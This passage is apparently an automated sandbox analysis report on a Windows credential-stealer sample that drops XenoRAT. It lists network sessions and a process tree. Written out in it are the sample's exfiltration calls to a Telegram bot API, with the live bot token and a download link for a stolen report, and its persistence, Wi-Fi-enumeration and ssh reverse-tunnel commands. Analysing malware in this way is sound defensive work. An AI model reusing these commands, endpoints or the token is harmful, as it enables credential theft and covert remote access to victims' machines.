11          192.168.2.5  49746        185.253.7.60    8080              1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 23:28:24.605931044 CEST  143 bytes  OUT
    GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1
    Host: 185.253.7.60:8080
    Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49712        149.154.167.220  443               1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
2024-09-27 21:27:17 UTC  607 bytes  OUT
    GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-09-27 21:27:17 UTC  389 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 27 Sep 2024 21:27:17 GMT
    Content-Type: application/json
    Content-Length: 1095
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 21:27:17 UTC  1095 bytes  IN
    Data Ascii: {"ok":true,"result":{"message_id":5211,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472437,"text":"#MS


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.5  49713        149.154.167.220  443               5500  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
2024-09-27 21:27:17 UTC  607 bytes  OUT
    GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-09-27 21:27:18 UTC  389 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 27 Sep 2024 21:27:18 GMT
    Content-Type: application/json
    Content-Length: 1095
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 21:27:18 UTC  1095 bytes  IN
    Data Ascii: {"ok":true,"result":{"message_id":5212,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472438,"text":"#MS


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.5  49740        149.154.167.220  443               1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
2024-09-27 21:28:01 UTC  902 bytes  OUT
    GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-09-27 21:28:02 UTC  389 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 27 Sep 2024 21:28:01 GMT
    Content-Type: application/json
    Content-Length: 1131
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 21:28:02 UTC  1131 bytes  IN
    Data Ascii: {"ok":true,"result":{"message_id":5213,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472481,"text":"#MS

Target ID: 0
Start time: 17:27:06
Start date: 27/09/2024
Path: C:\Users\user\Desktop\0LpFv1haTA.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\0LpFv1haTA.exe"
Imagebase: 0x19457b50000
File size: 9'593'944 bytes
MD5 hash: 1BAFB4856A31AE27271FBD2EE1574A4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 17:27:08
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Imagebase: 0x7ff618dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 17:27:08
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 17:27:08
Start date: 27/09/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff7f09b0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 17:27:08
Start date: 27/09/2024
Path: C:\Windows\System32\timeout.exe
Wow64 process (32bit): false
Commandline: timeout /t 3
Imagebase: 0x7ff626c40000
File size: 32'768 bytes
MD5 hash: 100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 17:27:11
Start date: 27/09/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Imagebase: 0x7ff664f40000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:27:11
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Imagebase: 0x21f0f480000
File size: 9'593'944 bytes
MD5 hash: 1BAFB4856A31AE27271FBD2EE1574A4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 8
Start time: 17:27:11
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Imagebase: 0x7ff618dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 17:27:11
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x1e448040000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:17:27:11
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                Imagebase:0x7ff7f09b0000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:17:27:12
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                                Imagebase:0x7ff618dd0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:17:27:12
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:17:27:12
Start date:27/09/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff7f09b0000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:17:27:12
Start date:27/09/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show profiles
Imagebase:0x7ff700020000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:17:27:12
Start date:27/09/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr /R /C:"[ ]:[ ]"
Imagebase:0x7ff75d1e0000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):false
Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Imagebase:0x7ff7308d0000
File size:946'176 bytes
MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Imagebase:0x7ff618dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff7f09b0000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show networks mode=bssid
Imagebase:0x7ff700020000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:17:27:13
Start date:27/09/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr "SSID BSSID Signal"
Imagebase:0x7ff75d1e0000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:17:27:14
Start date:27/09/2024
Path:C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):false
Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Imagebase:0x7ff7308d0000
File size:946'176 bytes
MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:17:27:14
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:17:27:17
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
                                                                                                                                                                                                Imagebase:0x7ff68d3a0000
                                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                Start time:17:28:01
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x19232df0000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                Start time:17:28:02
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\manager.exe"
                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\manager.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                Start time:17:28:02
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                Start time:17:28:07
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                                                                                                                                                                                                Imagebase:0xbf0000
                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                Start time:17:28:07
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                Start time:17:28:09
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Imagebase:0x8a0000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:46
